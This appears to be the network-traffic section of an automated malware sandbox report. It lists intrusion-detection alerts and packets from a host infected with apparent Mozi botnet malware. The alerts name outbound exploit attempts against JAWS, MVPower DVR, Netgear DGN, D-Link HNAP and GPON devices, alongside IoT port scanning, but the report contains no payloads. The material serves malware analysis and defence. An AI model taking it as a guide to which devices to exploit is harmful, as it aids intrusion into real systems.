                                                                                                        01/06/21-14:59:10.665829ICMP399ICMP Destination Unreachable Host Unreachable38.104.32.250192.168.2.20
                                                                                                        01/06/21-14:59:10.676133ICMP449ICMP Time-To-Live Exceeded in Transit103.9.136.110192.168.2.20
                                                                                                        01/06/21-14:59:10.676274ICMP449ICMP Time-To-Live Exceeded in Transit200.230.1.241192.168.2.20
                                                                                                        01/06/21-14:59:10.709483ICMP449ICMP Time-To-Live Exceeded in Transit43.246.162.37192.168.2.20
                                                                                                        01/06/21-14:59:11.027463ICMP449ICMP Time-To-Live Exceeded in Transit69.27.128.217192.168.2.20
                                                                                                        01/06/21-14:59:11.766311ICMP485ICMP Destination Unreachable Communication Administratively Prohibited168.95.157.5192.168.2.20
                                                                                                        01/06/21-14:59:17.493165ICMP485ICMP Destination Unreachable Communication Administratively Prohibited46.59.216.67192.168.2.20
                                                                                                        01/06/21-14:59:17.644489ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited154.95.78.148192.168.2.20
                                                                                                        01/06/21-14:59:17.757844ICMP402ICMP Destination Unreachable Port Unreachable201.5.240.99192.168.2.20
                                                                                                        01/06/21-14:59:17.777331TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4754280192.168.2.2045.196.102.179
                                                                                                        01/06/21-14:59:17.777331TCP2025883ET EXPLOIT MVPower DVR Shell UCE4754280192.168.2.2045.196.102.179
                                                                                                        01/06/21-14:59:20.505208ICMP399ICMP Destination Unreachable Host Unreachable89.176.100.130192.168.2.20
                                                                                                        01/06/21-14:59:20.554303ICMP399ICMP Destination Unreachable Host Unreachable89.96.148.18192.168.2.20
                                                                                                        01/06/21-14:59:20.554345ICMP399ICMP Destination Unreachable Host Unreachable89.96.148.18192.168.2.20
                                                                                                        01/06/21-14:59:20.554365ICMP399ICMP Destination Unreachable Host Unreachable89.96.148.18192.168.2.20
                                                                                                        01/06/21-14:59:20.731389ICMP399ICMP Destination Unreachable Host Unreachable150.99.191.46192.168.2.20
                                                                                                        01/06/21-14:59:20.735325ICMP399ICMP Destination Unreachable Host Unreachable150.99.191.46192.168.2.20
                                                                                                        01/06/21-14:59:23.735386ICMP399ICMP Destination Unreachable Host Unreachable150.99.191.46192.168.2.20
                                                                                                        01/06/21-14:59:24.510142ICMP485ICMP Destination Unreachable Communication Administratively Prohibited31.150.96.14192.168.2.20
                                                                                                        01/06/21-14:59:24.513714ICMP485ICMP Destination Unreachable Communication Administratively Prohibited46.165.182.127192.168.2.20
                                                                                                        01/06/21-14:59:24.653232ICMP399ICMP Destination Unreachable Host Unreachable64.59.132.10192.168.2.20
                                                                                                        01/06/21-14:59:24.779999TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound379708080192.168.2.20175.252.8.184
                                                                                                        01/06/21-14:59:24.779999TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution379708080192.168.2.20175.252.8.184
                                                                                                        01/06/21-14:59:28.701346UDP2030919ET TROJAN Mozi Botnet DHT Config Sent5744514165211.227.96.15192.168.2.20
                                                                                                        01/06/21-14:59:29.913151ICMP402ICMP Destination Unreachable Port Unreachable24.90.241.64192.168.2.20
                                                                                                        01/06/21-14:59:34.514870ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                        01/06/21-14:59:34.516841ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited134.97.128.247192.168.2.20
                                                                                                        01/06/21-14:59:34.625604ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.37.130.69192.168.2.20
                                                                                                        01/06/21-14:59:38.626832TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)4292280192.168.2.2023.96.36.243
                                                                                                        01/06/21-14:59:38.626832TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)4292280192.168.2.2023.96.36.243
                                                                                                        01/06/21-14:59:40.730858ICMP485ICMP Destination Unreachable Communication Administratively Prohibited94.218.155.42192.168.2.20
                                                                                                        01/06/21-14:59:44.518047ICMP399ICMP Destination Unreachable Host Unreachable109.224.192.76192.168.2.20
                                                                                                        01/06/21-14:59:44.518092ICMP399ICMP Destination Unreachable Host Unreachable109.224.192.76192.168.2.20
                                                                                                        01/06/21-14:59:45.513344ICMP485ICMP Destination Unreachable Communication Administratively Prohibited84.155.180.12192.168.2.20
                                                                                                        01/06/21-14:59:45.646914ICMP485ICMP Destination Unreachable Communication Administratively Prohibited4.16.0.234192.168.2.20
                                                                                                        01/06/21-14:59:45.674784ICMP401ICMP Destination Unreachable Network Unreachable193.203.0.195192.168.2.20
                                                                                                        01/06/21-14:59:45.686175ICMP402ICMP Destination Unreachable Port Unreachable189.130.236.65192.168.2.20
                                                                                                        01/06/21-14:59:45.749199ICMP449ICMP Time-To-Live Exceeded in Transit14.0.9.94192.168.2.20
                                                                                                        01/06/21-14:59:47.518142ICMP399ICMP Destination Unreachable Host Unreachable109.224.192.76192.168.2.20
                                                                                                        01/06/21-14:59:48.847505ICMP399ICMP Destination Unreachable Host Unreachable24.30.174.118192.168.2.20
                                                                                                        01/06/21-14:59:53.556488TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution4428680192.168.2.2034.117.168.156
                                                                                                        01/06/21-14:59:53.739447ICMP399ICMP Destination Unreachable Host Unreachable112.188.185.146192.168.2.20
                                                                                                        01/06/21-14:59:54.046507TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5160280192.168.2.20104.98.58.115
                                                                                                        01/06/21-14:59:54.046507TCP2025883ET EXPLOIT MVPower DVR Shell UCE5160280192.168.2.20104.98.58.115
                                                                                                        01/06/21-14:59:54.195096TCP1200ATTACK-RESPONSES Invalid URL8051602104.98.58.115192.168.2.20
                                                                                                        01/06/21-14:59:55.670149ICMP399ICMP Destination Unreachable Host Unreachable37.220.104.190192.168.2.20
                                                                                                        01/06/21-14:59:55.767354ICMP449ICMP Time-To-Live Exceeded in Transit41.210.241.47192.168.2.20
                                                                                                        01/06/21-14:59:59.587552ICMP449ICMP Time-To-Live Exceeded in Transit131.125.10.4192.168.2.20
                                                                                                        01/06/21-15:00:02.729524ICMP399ICMP Destination Unreachable Host Unreachable112.190.172.242192.168.2.20
                                                                                                        01/06/21-15:00:03.680547ICMP399ICMP Destination Unreachable Host Unreachable201.17.8.210192.168.2.20
                                                                                                        01/06/21-15:00:04.011617TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4739480192.168.2.2015.206.172.134
                                                                                                        01/06/21-15:00:04.011617TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4739480192.168.2.2015.206.172.134
                                                                                                        01/06/21-15:00:04.666236ICMP449ICMP Time-To-Live Exceeded in Transit98.152.214.82192.168.2.20
                                                                                                        01/06/21-15:00:06.964167ICMP402ICMP Destination Unreachable Port Unreachable78.78.189.39192.168.2.20
                                                                                                        01/06/21-15:00:07.070263ICMP449ICMP Time-To-Live Exceeded in Transit185.214.76.18192.168.2.20
                                                                                                        01/06/21-15:00:13.658998ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited107.164.203.92192.168.2.20
                                                                                                        01/06/21-15:00:15.163187ICMP399ICMP Destination Unreachable Host Unreachable79.104.247.43192.168.2.20
                                                                                                        01/06/21-15:00:17.600297ICMP399ICMP Destination Unreachable Host Unreachable72.26.212.10192.168.2.20
                                                                                                        01/06/21-15:00:17.600346ICMP399ICMP Destination Unreachable Host Unreachable72.26.212.10192.168.2.20
                                                                                                        01/06/21-15:00:22.038873ICMP399ICMP Destination Unreachable Host Unreachable212.55.211.226192.168.2.20
                                                                                                        01/06/21-15:00:22.044159ICMP399ICMP Destination Unreachable Host Unreachable213.61.250.219192.168.2.20
                                                                                                        01/06/21-15:00:22.660655TCP1200ATTACK-RESPONSES Invalid URL806019623.218.46.16192.168.2.20
                                                                                                        01/06/21-15:00:22.368252TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution6019680192.168.2.2023.218.46.16
                                                                                                        01/06/21-15:00:23.675431ICMP402ICMP Destination Unreachable Port Unreachable187.225.228.249192.168.2.20
                                                                                                        01/06/21-15:00:27.618697ICMP449ICMP Time-To-Live Exceeded in Transit205.145.208.5192.168.2.20
                                                                                                        01/06/21-15:00:30.738458ICMP399ICMP Destination Unreachable Host Unreachable182.163.63.250192.168.2.20
                                                                                                        01/06/21-15:00:30.738495ICMP399ICMP Destination Unreachable Host Unreachable182.163.63.250192.168.2.20
                                                                                                        01/06/21-15:00:33.743342ICMP399ICMP Destination Unreachable Host Unreachable182.163.63.250192.168.2.20
                                                                                                        01/06/21-15:00:34.533756ICMP485ICMP Destination Unreachable Communication Administratively Prohibited92.192.4.224192.168.2.20
                                                                                                        01/06/21-15:00:34.755757ICMP449ICMP Time-To-Live Exceeded in Transit221.134.65.145192.168.2.20
                                                                                                        01/06/21-15:00:34.799127ICMP399ICMP Destination Unreachable Host Unreachable181.224.188.111192.168.2.20
                                                                                                        01/06/21-15:00:34.799176ICMP399ICMP Destination Unreachable Host Unreachable181.224.188.111192.168.2.20
                                                                                                        01/06/21-15:00:34.799204ICMP399ICMP Destination Unreachable Host Unreachable181.224.188.111192.168.2.20
                                                                                                        01/06/21-15:00:34.743587TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound601308080192.168.2.2099.61.64.177
                                                                                                        01/06/21-15:00:34.743587TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution601308080192.168.2.2099.61.64.177
                                                                                                        01/06/21-15:00:35.946397ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                        01/06/21-15:00:37.687702ICMP399ICMP Destination Unreachable Host Unreachable10.161.35.62192.168.2.20
                                                                                                        01/06/21-15:00:37.687741ICMP399ICMP Destination Unreachable Host Unreachable10.161.35.62192.168.2.20
                                                                                                        01/06/21-15:00:40.478363ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                        01/06/21-15:00:40.687677ICMP399ICMP Destination Unreachable Host Unreachable10.161.35.62192.168.2.20
                                                                                                        01/06/21-15:00:41.002551ICMP399ICMP Destination Unreachable Host Unreachable182.48.81.78192.168.2.20
                                                                                                        01/06/21-15:00:41.002592ICMP399ICMP Destination Unreachable Host Unreachable182.48.81.78192.168.2.20
                                                                                                        01/06/21-15:00:41.489646ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                        01/06/21-15:00:41.790199ICMP449ICMP Time-To-Live Exceeded in Transit210.171.224.224192.168.2.20
                                                                                                        01/06/21-15:00:44.002405ICMP399ICMP Destination Unreachable Host Unreachable182.48.81.78192.168.2.20
                                                                                                        01/06/21-15:00:44.505012ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                        01/06/21-15:00:44.528371ICMP485ICMP Destination Unreachable Communication Administratively Prohibited92.210.243.211192.168.2.20
                                                                                                        01/06/21-15:00:44.685468ICMP449ICMP Time-To-Live Exceeded in Transit10.252.252.1192.168.2.20
                                                                                                        01/06/21-15:00:44.711819ICMP399ICMP Destination Unreachable Host Unreachable10.5.4.1192.168.2.20
                                                                                                        01/06/21-15:00:44.711848ICMP399ICMP Destination Unreachable Host Unreachable10.5.4.1192.168.2.20
                                                                                                        01/06/21-15:00:44.739614ICMP399ICMP Destination Unreachable Host Unreachable121.173.147.138192.168.2.20
                                                                                                        01/06/21-15:00:44.739654ICMP399ICMP Destination Unreachable Host Unreachable121.173.147.138192.168.2.20
                                                                                                        01/06/21-15:00:45.510429ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                        01/06/21-15:00:46.628890ICMP449ICMP Time-To-Live Exceeded in Transit206.172.194.249192.168.2.20
                                                                                                        01/06/21-15:00:47.513242ICMP399ICMP Destination Unreachable Host Unreachable136.163.209.40192.168.2.20
                                                                                                        01/06/21-15:00:47.522638ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                        01/06/21-15:00:47.740330ICMP399ICMP Destination Unreachable Host Unreachable121.173.147.138192.168.2.20
                                                                                                        01/06/21-15:00:47.879974ICMP399ICMP Destination Unreachable Host Unreachable10.5.4.1192.168.2.20
                                                                                                        01/06/21-15:00:48.801065ICMP449ICMP Time-To-Live Exceeded in Transit61.109.133.114192.168.2.20
                                                                                                        01/06/21-15:00:51.547976ICMP399ICMP Destination Unreachable Host Unreachable89.228.14.10192.168.2.20
                                                                                                        01/06/21-15:00:55.503956ICMP401ICMP Destination Unreachable Network Unreachable217.196.225.4192.168.2.20
                                                                                                        01/06/21-15:00:55.656977ICMP399ICMP Destination Unreachable Host Unreachable64.59.150.30192.168.2.20
                                                                                                        01/06/21-15:00:58.623318ICMP485ICMP Destination Unreachable Communication Administratively Prohibited24.215.105.193192.168.2.20
                                                                                                        01/06/21-15:00:59.538392ICMP485ICMP Destination Unreachable Communication Administratively Prohibited217.92.141.24192.168.2.20
                                                                                                        01/06/21-15:01:01.653841ICMP399ICMP Destination Unreachable Host Unreachable196.22.163.190192.168.2.20
                                                                                                        01/06/21-15:01:01.653906ICMP399ICMP Destination Unreachable Host Unreachable196.22.163.190192.168.2.20
                                                                                                        01/06/21-15:01:02.638356ICMP449ICMP Time-To-Live Exceeded in Transit65.206.180.73192.168.2.20
                                                                                                        01/06/21-15:01:02.711279ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited187.18.116.82192.168.2.20
                                                                                                        01/06/21-15:01:04.648133ICMP399ICMP Destination Unreachable Host Unreachable196.22.163.190192.168.2.20
                                                                                                        01/06/21-15:01:04.727164ICMP399ICMP Destination Unreachable Host Unreachable174.61.0.221192.168.2.20
                                                                                                        01/06/21-15:01:04.727220ICMP399ICMP Destination Unreachable Host Unreachable174.61.0.221192.168.2.20
                                                                                                        01/06/21-15:01:04.727247ICMP399ICMP Destination Unreachable Host Unreachable174.61.0.221192.168.2.20
                                                                                                        01/06/21-15:01:07.140486ICMP399ICMP Destination Unreachable Host Unreachable196.218.192.105192.168.2.20
                                                                                                        01/06/21-15:01:07.140549ICMP399ICMP Destination Unreachable Host Unreachable196.218.192.105192.168.2.20
                                                                                                        01/06/21-15:01:07.141227ICMP399ICMP Destination Unreachable Host Unreachable196.218.192.105192.168.2.20
                                                                                                        01/06/21-15:01:08.469717ICMP399ICMP Destination Unreachable Host Unreachable10.45.129.110192.168.2.20
                                                                                                        01/06/21-15:01:08.469761ICMP399ICMP Destination Unreachable Host Unreachable10.45.129.110192.168.2.20
                                                                                                        01/06/21-15:01:09.641868ICMP401ICMP Destination Unreachable Network Unreachable216.221.97.226192.168.2.20
                                                                                                        01/06/21-15:01:09.663777ICMP401ICMP Destination Unreachable Network Unreachable203.116.7.190192.168.2.20
                                                                                                        01/06/21-15:01:09.756970TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4497480192.168.2.20192.155.170.244
                                                                                                        01/06/21-15:01:09.792811ICMP449ICMP Time-To-Live Exceeded in Transit109.197.243.33192.168.2.20
                                                                                                        01/06/21-15:01:09.756970TCP2025883ET EXPLOIT MVPower DVR Shell UCE4497480192.168.2.20192.155.170.244
                                                                                                        01/06/21-15:01:10.557548ICMP399ICMP Destination Unreachable Host Unreachable10.100.100.2192.168.2.20
                                                                                                        01/06/21-15:01:11.459120ICMP399ICMP Destination Unreachable Host Unreachable187.120.48.29192.168.2.20
                                                                                                        01/06/21-15:01:11.459159ICMP399ICMP Destination Unreachable Host Unreachable187.120.48.29192.168.2.20
                                                                                                        01/06/21-15:01:11.759555ICMP399ICMP Destination Unreachable Host Unreachable10.45.129.110192.168.2.20
                                                                                                        01/06/21-15:01:12.536314ICMP399ICMP Destination Unreachable Host Unreachable90.80.66.54192.168.2.20
                                                                                                        01/06/21-15:01:13.538855ICMP449ICMP Time-To-Live Exceeded in Transit100.64.0.35192.168.2.20
                                                                                                        01/06/21-15:01:14.698060ICMP399ICMP Destination Unreachable Host Unreachable187.120.48.29192.168.2.20
                                                                                                        01/06/21-15:01:15.298378ICMP399ICMP Destination Unreachable Host Unreachable140.114.3.30192.168.2.20
                                                                                                        01/06/21-15:01:15.654951ICMP399ICMP Destination Unreachable Host Unreachable10.99.11.2192.168.2.20
                                                                                                        01/06/21-15:01:15.654995ICMP399ICMP Destination Unreachable Host Unreachable10.99.11.2192.168.2.20
                                                                                                        01/06/21-15:01:16.513742ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.148.141.21192.168.2.20
                                                                                                        01/06/21-15:01:16.609090TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution5726280192.168.2.2051.178.69.101
                                                                                                        01/06/21-15:01:18.655107ICMP399ICMP Destination Unreachable Host Unreachable10.99.11.2192.168.2.20
                                                                                                        01/06/21-15:01:19.630878ICMP449ICMP Time-To-Live Exceeded in Transit10.22.134.50192.168.2.20
                                                                                                        01/06/21-15:01:23.515123ICMP399ICMP Destination Unreachable Host Unreachable94.225.9.137192.168.2.20
                                                                                                        01/06/21-15:01:23.519484ICMP399ICMP Destination Unreachable Host Unreachable94.225.9.137192.168.2.20
                                                                                                        01/06/21-15:01:23.678210ICMP449ICMP Time-To-Live Exceeded in Transit41.79.148.162192.168.2.20
                                                                                                        01/06/21-15:01:23.715193ICMP449ICMP Time-To-Live Exceeded in Transit152.255.134.213192.168.2.20
                                                                                                        01/06/21-15:01:23.725990TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5364680192.168.2.20184.31.173.81
                                                                                                        01/06/21-15:01:23.721650TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)5323680192.168.2.2066.201.89.13
                                                                                                        01/06/21-15:01:23.721650TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)5323680192.168.2.2066.201.89.13
                                                                                                        01/06/21-15:01:23.725990TCP2025883ET EXPLOIT MVPower DVR Shell UCE5364680192.168.2.20184.31.173.81
                                                                                                        01/06/21-15:01:23.922187TCP1200ATTACK-RESPONSES Invalid URL8053646184.31.173.81192.168.2.20
                                                                                                        01/06/21-15:01:26.514965ICMP399ICMP Destination Unreachable Host Unreachable94.225.9.137192.168.2.20
                                                                                                        01/06/21-15:01:26.527114ICMP399ICMP Destination Unreachable Host Unreachable178.114.115.193192.168.2.20
                                                                                                        01/06/21-15:01:26.528310ICMP399ICMP Destination Unreachable Host Unreachable178.114.115.193192.168.2.20
                                                                                                        01/06/21-15:01:29.529879ICMP399ICMP Destination Unreachable Host Unreachable178.114.115.193192.168.2.20
                                                                                                        01/06/21-15:01:30.636098ICMP399ICMP Destination Unreachable Host Unreachable66.97.63.178192.168.2.20
                                                                                                        01/06/21-15:01:30.778657ICMP485ICMP Destination Unreachable Communication Administratively Prohibited222.227.19.236192.168.2.20
                                                                                                        01/06/21-15:01:32.010106ICMP399ICMP Destination Unreachable Host Unreachable122.210.220.65192.168.2.20
                                                                                                        01/06/21-15:01:33.529990ICMP401ICMP Destination Unreachable Network Unreachable193.203.0.195192.168.2.20
                                                                                                        01/06/21-15:01:37.779865TCP1200ATTACK-RESPONSES Invalid URL804681623.218.148.138192.168.2.20
                                                                                                        01/06/21-15:01:37.647291TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution4681680192.168.2.2023.218.148.138
                                                                                                        01/06/21-15:01:37.824612TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)5938280192.168.2.2045.195.180.141
                                                                                                        01/06/21-15:01:37.824612TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)5938280192.168.2.2045.195.180.141
                                                                                                        01/06/21-15:01:30.654612TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution5565280192.168.2.2038.87.83.34

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 6, 2021 14:57:25.823198080 CET5124680192.168.2.20174.143.64.178
                                                                                                        Jan 6, 2021 14:57:25.823200941 CET539308080192.168.2.20162.234.162.7
                                                                                                        Jan 6, 2021 14:57:25.823214054 CET3287437215192.168.2.2049.44.95.153
                                                                                                        Jan 6, 2021 14:57:25.823215008 CET450405555192.168.2.20155.152.8.152
                                                                                                        Jan 6, 2021 14:57:25.823242903 CET548648080192.168.2.20214.112.173.213
                                                                                                        Jan 6, 2021 14:57:25.823247910 CET4128052869192.168.2.20206.186.242.243
                                                                                                        Jan 6, 2021 14:57:25.823256969 CET381868443192.168.2.20201.254.11.90
                                                                                                        Jan 6, 2021 14:57:25.823261023 CET395108080192.168.2.20120.148.200.141
                                                                                                        Jan 6, 2021 14:57:25.823291063 CET3885880192.168.2.207.82.224.45
                                                                                                        Jan 6, 2021 14:57:25.823327065 CET5870280192.168.2.2017.46.202.252
                                                                                                        Jan 6, 2021 14:57:25.823376894 CET4066849152192.168.2.20182.58.239.246
                                                                                                        Jan 6, 2021 14:57:25.823406935 CET5728280192.168.2.20170.141.215.107
                                                                                                        Jan 6, 2021 14:57:25.823453903 CET4686252869192.168.2.2068.124.102.212
                                                                                                        Jan 6, 2021 14:57:25.823487997 CET442087574192.168.2.2094.194.209.135
                                                                                                        Jan 6, 2021 14:57:25.823517084 CET5213037215192.168.2.2011.202.4.51
                                                                                                        Jan 6, 2021 14:57:25.823548079 CET5797080192.168.2.20191.117.242.253
                                                                                                        Jan 6, 2021 14:57:25.823641062 CET516445555192.168.2.20198.228.200.241
                                                                                                        Jan 6, 2021 14:57:25.823704958 CET4680652869192.168.2.2024.29.191.22
                                                                                                        Jan 6, 2021 14:57:25.823745966 CET4494880192.168.2.2060.207.103.133
                                                                                                        Jan 6, 2021 14:57:25.823870897 CET6019480192.168.2.2012.67.83.95
                                                                                                        Jan 6, 2021 14:57:25.823868036 CET5262080192.168.2.20174.98.164.70
                                                                                                        Jan 6, 2021 14:57:25.823936939 CET352668080192.168.2.2035.119.229.43
                                                                                                        Jan 6, 2021 14:57:25.823954105 CET339128080192.168.2.20121.130.73.42
                                                                                                        Jan 6, 2021 14:57:25.823992968 CET462345555192.168.2.20186.54.121.35
                                                                                                        Jan 6, 2021 14:57:25.824027061 CET4168480192.168.2.20218.243.118.179
                                                                                                        Jan 6, 2021 14:57:25.824074984 CET582247574192.168.2.20190.127.144.31
                                                                                                        Jan 6, 2021 14:57:25.824107885 CET3790480192.168.2.20142.48.174.160
                                                                                                        Jan 6, 2021 14:57:25.824143887 CET528147574192.168.2.20128.70.68.149
                                                                                                        Jan 6, 2021 14:57:25.824173927 CET440628080192.168.2.2076.44.19.56
                                                                                                        Jan 6, 2021 14:57:25.824219942 CET537105555192.168.2.20131.221.67.66
                                                                                                        Jan 6, 2021 14:57:25.824242115 CET383628080192.168.2.2026.221.252.159
                                                                                                        Jan 6, 2021 14:57:25.824289083 CET4726652869192.168.2.20218.184.12.7
                                                                                                        Jan 6, 2021 14:57:25.824321032 CET553548443192.168.2.2098.38.174.140
                                                                                                        Jan 6, 2021 14:57:25.824350119 CET597788443192.168.2.2057.122.76.123
                                                                                                        Jan 6, 2021 14:57:25.824383974 CET443808080192.168.2.20153.254.249.142
                                                                                                        Jan 6, 2021 14:57:25.824420929 CET3805681192.168.2.2075.81.234.138
                                                                                                        Jan 6, 2021 14:57:25.824453115 CET577285555192.168.2.20205.200.160.114
                                                                                                        Jan 6, 2021 14:57:25.824486971 CET4351649152192.168.2.2082.24.32.9
                                                                                                        Jan 6, 2021 14:57:25.824526072 CET4288449152192.168.2.20195.12.213.244
                                                                                                        Jan 6, 2021 14:57:25.824564934 CET490387574192.168.2.203.210.135.11
                                                                                                        Jan 6, 2021 14:57:25.824601889 CET5231681192.168.2.20162.110.153.1
                                                                                                        Jan 6, 2021 14:57:25.824721098 CET3398681192.168.2.20120.94.211.11
                                                                                                        Jan 6, 2021 14:57:25.824743032 CET371308080192.168.2.20137.170.59.38
                                                                                                        Jan 6, 2021 14:57:25.824771881 CET3430480192.168.2.2099.92.234.88
                                                                                                        Jan 6, 2021 14:57:25.824815035 CET3794680192.168.2.2091.225.198.104
                                                                                                        Jan 6, 2021 14:57:25.824856997 CET3920681192.168.2.2081.4.149.202
                                                                                                        Jan 6, 2021 14:57:25.824884892 CET603108080192.168.2.2023.238.107.169
                                                                                                        Jan 6, 2021 14:57:25.824923038 CET408988443192.168.2.20171.254.103.135
                                                                                                        Jan 6, 2021 14:57:25.824955940 CET4822837215192.168.2.207.39.247.208
                                                                                                        Jan 6, 2021 14:57:25.825006008 CET542308080192.168.2.20125.223.44.138
                                                                                                        Jan 6, 2021 14:57:25.825036049 CET3491281192.168.2.20146.247.28.72
                                                                                                        Jan 6, 2021 14:57:25.825068951 CET6027052869192.168.2.2038.24.144.193
                                                                                                        Jan 6, 2021 14:57:25.825119972 CET3826649152192.168.2.2081.141.9.101
                                                                                                        Jan 6, 2021 14:57:25.825139999 CET3355881192.168.2.20175.250.213.121
                                                                                                        Jan 6, 2021 14:57:25.825190067 CET488007574192.168.2.20145.144.180.237
                                                                                                        Jan 6, 2021 14:57:25.825206995 CET393445555192.168.2.20153.76.243.35
                                                                                                        Jan 6, 2021 14:57:25.825252056 CET344908080192.168.2.2018.106.206.85
                                                                                                        Jan 6, 2021 14:57:25.825310946 CET420708080192.168.2.20134.169.30.105
                                                                                                        Jan 6, 2021 14:57:25.825351000 CET347067574192.168.2.2019.144.174.109
                                                                                                        Jan 6, 2021 14:57:25.825393915 CET3438680192.168.2.20160.203.138.118
                                                                                                        Jan 6, 2021 14:57:25.825419903 CET3790637215192.168.2.2082.65.114.102
                                                                                                        Jan 6, 2021 14:57:25.825454950 CET4596680192.168.2.2029.169.240.108
                                                                                                        Jan 6, 2021 14:57:25.825483084 CET5256280192.168.2.20163.222.197.26
                                                                                                        Jan 6, 2021 14:57:25.825536966 CET4316680192.168.2.20192.95.229.252
                                                                                                        Jan 6, 2021 14:57:25.825587988 CET4846681192.168.2.20106.15.186.130
                                                                                                        Jan 6, 2021 14:57:25.825613976 CET579568080192.168.2.20139.119.181.153
                                                                                                        Jan 6, 2021 14:57:25.825644970 CET5937880192.168.2.2043.250.68.145
                                                                                                        Jan 6, 2021 14:57:25.825699091 CET595448080192.168.2.20216.76.72.47
                                                                                                        Jan 6, 2021 14:57:25.825710058 CET4617852869192.168.2.2086.99.33.243
                                                                                                        Jan 6, 2021 14:57:25.826148033 CET439808443192.168.2.2063.159.4.132
                                                                                                        Jan 6, 2021 14:57:25.826149940 CET4625837215192.168.2.20220.248.226.183
                                                                                                        Jan 6, 2021 14:57:25.826170921 CET558048080192.168.2.2026.194.71.217
                                                                                                        Jan 6, 2021 14:57:25.826195955 CET5404680192.168.2.20222.12.248.210
                                                                                                        Jan 6, 2021 14:57:25.826221943 CET5354649152192.168.2.20220.149.177.74
                                                                                                        Jan 6, 2021 14:57:25.826250076 CET534728080192.168.2.20105.66.122.27
                                                                                                        Jan 6, 2021 14:57:25.826270103 CET381968080192.168.2.2089.235.112.28
                                                                                                        Jan 6, 2021 14:57:25.826311111 CET5810680192.168.2.20148.9.146.9
                                                                                                        Jan 6, 2021 14:57:25.826337099 CET593765555192.168.2.2029.135.222.49
                                                                                                        Jan 6, 2021 14:57:25.826366901 CET4952449152192.168.2.20208.202.72.240
                                                                                                        Jan 6, 2021 14:57:25.826395035 CET416428080192.168.2.20165.172.98.68
                                                                                                        Jan 6, 2021 14:57:25.826423883 CET5778480192.168.2.2058.2.22.44
                                                                                                        Jan 6, 2021 14:57:25.826446056 CET5483037215192.168.2.2053.96.67.14
                                                                                                        Jan 6, 2021 14:57:25.826474905 CET4754449152192.168.2.20133.162.173.63
                                                                                                        Jan 6, 2021 14:57:25.826514006 CET335668080192.168.2.20215.146.210.187
                                                                                                        Jan 6, 2021 14:57:25.826554060 CET377868443192.168.2.20141.205.147.62
                                                                                                        Jan 6, 2021 14:57:25.826590061 CET3407037215192.168.2.2041.206.221.126
                                                                                                        Jan 6, 2021 14:57:25.826602936 CET4414681192.168.2.20213.246.220.122
                                                                                                        Jan 6, 2021 14:57:25.826627970 CET5835881192.168.2.20214.101.231.205
                                                                                                        Jan 6, 2021 14:57:25.826646090 CET4116080192.168.2.20142.24.206.40
                                                                                                        Jan 6, 2021 14:57:25.826674938 CET504048080192.168.2.20195.47.32.35
                                                                                                        Jan 6, 2021 14:57:25.826716900 CET389208080192.168.2.20206.85.0.219
                                                                                                        Jan 6, 2021 14:57:25.826756954 CET514888080192.168.2.20193.139.114.52
                                                                                                        Jan 6, 2021 14:57:25.826773882 CET383828443192.168.2.2021.39.93.98
                                                                                                        Jan 6, 2021 14:57:25.826797962 CET5127852869192.168.2.2050.74.153.237
                                                                                                        Jan 6, 2021 14:57:25.826824903 CET454185555192.168.2.20219.2.155.95
                                                                                                        Jan 6, 2021 14:57:25.826857090 CET467127574192.168.2.2020.162.94.18
                                                                                                        Jan 6, 2021 14:57:25.826879025 CET433848080192.168.2.20188.213.189.127
                                                                                                        Jan 6, 2021 14:57:25.826905966 CET3920852869192.168.2.20189.5.233.211
                                                                                                        Jan 6, 2021 14:57:25.826926947 CET3892837215192.168.2.2014.134.169.239
                                                                                                        Jan 6, 2021 14:57:25.826982975 CET5508480192.168.2.20100.179.158.248

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 6, 2021 14:57:45.387015104 CET5871353192.168.2.208.8.8.8
                                                                                                        Jan 6, 2021 14:57:45.435297966 CET53587138.8.8.8192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.438105106 CET141656881192.168.2.2087.98.162.88
